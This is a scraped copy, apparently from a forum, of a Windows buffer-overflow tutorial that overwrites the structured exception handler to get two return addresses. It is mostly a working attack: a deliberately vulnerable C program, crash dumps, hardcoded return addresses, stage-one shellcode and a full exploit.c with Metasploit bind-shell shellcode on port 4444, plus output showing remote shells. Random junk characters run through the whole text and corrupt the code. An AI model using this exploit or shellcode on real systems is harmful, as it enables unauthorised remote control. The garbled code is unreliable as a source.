The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.3 M9 b1 e4 S0 e+ J# u0 |6 n' F
2 M2 y& b, T+ c' Z
[Buf] <- Shellcode- [ t- p7 P% V% G6 r* X9 z9 W
[Return Address] <- jmp register (for Windows XP sp1)" S. `; ]4 O2 V0 n+ p: B! I: i3 r
[Various Stack Data] <- Junk ; V# o s9 Y2 o5 N8 K2 h. h* a[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward $ n: j f8 C9 I* t. f% u[SE Handler] <- jmp register (for Win2k sp4) 0 `7 v$ F9 L: B( n[Stage1 Shellcode] <- stage1 shellcode for win2k) | M; Q" g* I9 e
; r" I; d" d2 bIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses 6 F% Z; V: j7 p: H 6 }# o9 Q1 s) \% L4 nNecessary Tools: # O2 M/ K6 X. G; J- K% _: S# M- OllyDBG ! S5 i/ v/ n1 h! h1 Q- C/C++ Compiler " J0 n; x/ n7 s1 V& ^. E/ W- nasm ; c' k/ U) B; `4 i- Sac* M% C& u. D% N( H3 l
0 v% P; t- b2 m5 e* U7 Q$ {
Vulnerable Code: 1 R' }+ n* b: H$ A" F7 t |//lamebuf.c. M! s' S' n; N! ^% D" ^8 W$ |
#include<stdio.h> ( ~/ k3 w7 E" B. n#include<string.h> 1 B2 K! ^# p) I4 X3 E#include<windows.h>2 ]3 u, o5 P9 a0 B+ v
int main(int argc,char *argv[]){4 K3 s: u# M/ e5 z# {9 \0 v) c% t" w
$ t/ r g1 R! B! z' h' X pchar buf[512]; 3 N1 w" J% A& v: W2 Hchar buf1[1024]; // <- simulate a stack t/ V5 X: d1 w+ \% Y! j/ t( ]
//DebugBreak(); ( y) b0 |5 r9 yif (argc != 2){ return -1; }5 q( Y7 F/ ~3 c" L
# H$ E, T' w6 p8 q7 K, |
strcpy(buf,argv[1]);1 `& H1 Z% g; {( J* J- Q
return 0x0; : }: c2 @) m5 }} * _8 i- J" Y! \+ O4 h $ {4 j0 t8 Q; W: }2 CGetting Started: 5 Q4 H" q2 @' _Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers: 4 s+ E* ?8 o; l4 j" I$ ` 6 W& o7 P. }9 ?. AEAX 00000000 9 k. t: d% u( X3 i' {/ [ECX 00321404 $ E& K% o3 G8 S* K5 d$ x# I" YEDX 00414141* z( ]4 U. j; \' v6 r, {8 o
EBX 7FFDF000 - A. E) t: F0 Z: ?, N1 V! P- |ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" / G3 O/ E9 J0 I$ o; n- S. ^EBP 41414141 * p' ^9 D l9 c" A8 X5 gESI 77D4595F & E8 S. a2 ?. ~2 aEDI 77F59037 ntdll.77F590374 E; u/ I Y0 H- c' t# m+ \4 {$ i. ?
EIP 41414141: x; s& N* ]' d4 Y% R' q o: k
- I _3 B/ d- U# V% E( a& SLets take a look at the stack and see what happened to the default exception handler: 1 o/ g, r& ?( L+ f3 `& i1 A0x0012FFB0 41414141 Pointer to next SEH Record% ~+ ^+ P2 z/ W4 p2 O4 d2 V
0x0012FFB4 41414141 SE Handler# |. \4 q: v. u
& ]- V$ U8 d! j1 j: QWe successfully overwrote the return address and the default exception handler. o3 s2 \% @5 T* Y; O 1 g1 M" D# C& ~7 e; \. EPrimary Return Address (Windows XP SP1 EN): % J! X& Y) H& qThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:! k. s+ F) @; A- X
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"3 {- }( j& _) M9 C2 A0 D/ f
% z+ k7 l, \* o2 U7 P7 fSecondary Return Address (Windows 2000 SP4 EN): I1 z6 d, r% G3 e9 dThe secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:7 e1 t1 Z9 Q- d$ z0 k
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1" ! C' U3 d6 x! }# _: J; \ 9 @, @) s# |6 {/ s' E& ^% A/ z$ jProof Of Concept: ; A. c4 [* W2 @// exploit.c # b* o" L; D# _5 J# S0 T- s// Tal zeltzer - [Double Return] // 1 {7 Z; e# g) L $ \7 T9 g E# ?" Z1 \5 \& @#include<stdio.h> ! Z4 I2 }& M0 k& p- O% R1 @5 s#include<string.h> + @7 [ s6 q6 ] A#include<windows.h> 7 z" h- l- `* n8 |3 q" a" n; d; {3 A6 l3 ^8 H7 ^( P+ {8 w
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp; ~: t2 v$ `+ Y. I
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx : z( H( L7 F8 [" l$ u) f # w w0 ]( M+ W9 {& R// Stage1 For WinXP Sp1 English # U2 g7 I3 t U; a$ Wunsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";) R. n- G& A8 I1 O6 T
7 z! ^3 ~% w5 S
// Stage1 For Win2k Sp4 English ) K- F! X5 ?2 h5 ^% X" Junsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";4 N8 r1 ]2 @2 v! A7 x
* P, j' G2 v4 R7 `! E7 V: a
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com! D G% [7 T$ D) S3 Z
unsigned char shellcode[] = \3 C$ R7 T, _ ?- G"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"( K" L# L9 I% V) `
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"0 G: t; o$ W z. ~
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"# r* Z5 V6 L& s& n5 U! v7 d
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0" # W. E- h1 p6 x# e"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" 0 s7 _6 G/ r( |3 p) ]) ~0 r1 C"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15" * R8 m- |( }/ Y' p& \; a! ?+ t"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"# z; A% Z) C: l3 g0 f
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53" ; g& ~: R* t1 C1 Q"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" 8 E- M8 B8 C0 d/ C( Y"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"( K6 ^' k1 j/ M0 d- B& g8 C
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb" $ z0 i8 h/ v. L"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" ; F3 f+ i+ i) \7 l"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" 2 V, K! Z0 b2 ?' u- e+ h"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" ( j5 Z9 L! z5 ]: i"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f": G* D5 q2 S7 M P' w
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" + ?0 n: B3 b7 i+ ^; J"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"3 F9 v6 d, a0 ?1 g c
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" 1 Z7 D' j% C7 A"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8" 2 s3 }! ]+ l# o- V) Z9 A7 C# z"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" 9 e! d5 [" N, T( ]$ N' \"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f" , F9 |# b$ e3 J& j+ w+ L"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" ) S* M$ O9 o0 D, j"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" # h- L) R0 V! _2 _* ]& Q"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"3 \9 D# W5 v! A* \3 }1 O
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";- ? p3 i2 F8 ^
" P! D- a% Y9 ^+ R1 w4 N3 |# d2 p( ^; A" D3 K% n
int main(int argc,char *argv[]){ ; h+ p/ Z/ z8 n% K+ j) r3 I% `1 Z! f6 h' w$ a3 n9 ?
char *bufExe[3]; 0 V h- n8 @) x1 L N; W% Wchar buf[2048]; ! Z/ k$ k9 k5 ^6 X; fbufExe[0] = "lamebuf.exe";" u. g8 _% b, [6 L& H
bufExe[2] = NULL;) n" U+ y5 { Y: r. G1 ^, u" f3 r& h
$ J! J; }" F9 M' l* ~
memset(buf,0x0,sizeof(buf)); , f; }5 w r4 U8 ~% Kmemset(buf,0x90,1652); * l! }$ m1 y) q* ~. B5 J Wmemcpy(&buf[24],shellcode,sizeof(shellcode)-1); 0 b$ ]4 X% q" _ . G# c6 }- M; K9 |- _% J! imemcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode 0 g, X4 v& W1 x' ^memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode 0 w/ D0 a6 D% j7 O % P F4 t3 v; n( C8 W% i/ E! J% b( r*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en5 D8 n/ O6 m; Z8 J6 q+ M
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code ; o8 D" B5 m# k t, v8 S# p# v* b" T*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en 2 t. N$ _) ~( X7 {7 a" ~/ I9 k2 }5 c s+ D
" ?1 k b: ?4 ]& T- N
bufExe[1] = buf; ( B0 w3 y. N1 P# x+ M8 c//Execute the vulnerable application , m2 z5 h5 X1 V. Rexecve(bufExe[0],bufExe,NULL);/ ]! M: g! Y$ C1 r- H
6 P6 i8 E/ n; M2 u! V
return 0x0; * ]5 O9 e1 y: x3 _+ x} % J" S3 w5 R7 I: G3 A7 M$ K F( a5 C5 t4 n) b) G
Exploit under Windows XP SP1:/ G% \$ W4 I) E( c
C:\>exploit2 q3 x5 v+ |. D, C
C:\> L" s4 G! A! g3 y
C:\>telnet 127.0.0.1 4444 7 a0 e* g O; V e1 t$ [8 t+ z. z
Microsoft Windows XP [Version 5.1.2600]" T' y5 v2 W8 o% o2 _8 l C
(C) Copyright 1985-2001 Microsoft Corp., `6 r6 d/ z b* I
( S$ Y) {3 K: Y/ L3 M$ l! bC:\> ' X# ~, C! W, `6 }- J0 v0 \ 4 v4 J r( P6 N& u: q% XExploit under Windows 2000 SP4: * C4 ]# ?7 q0 H/ MC:\>exploit3 b" \4 [: b' A9 C' \; ?
C:\>4 Z" Y1 G9 X$ H% H: }8 Y8 m# I
C:\>telnet 127.0.0.1 4444 : c6 i# J0 g; e8 r3 `) r+ K& K9 C0 `; s- Y* V' T
Microsoft Windows 2000 [Version 5.00.2195] ! e, T& Q' c- J: y(C) Copyright 1985-2000 Microsoft Corp.
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
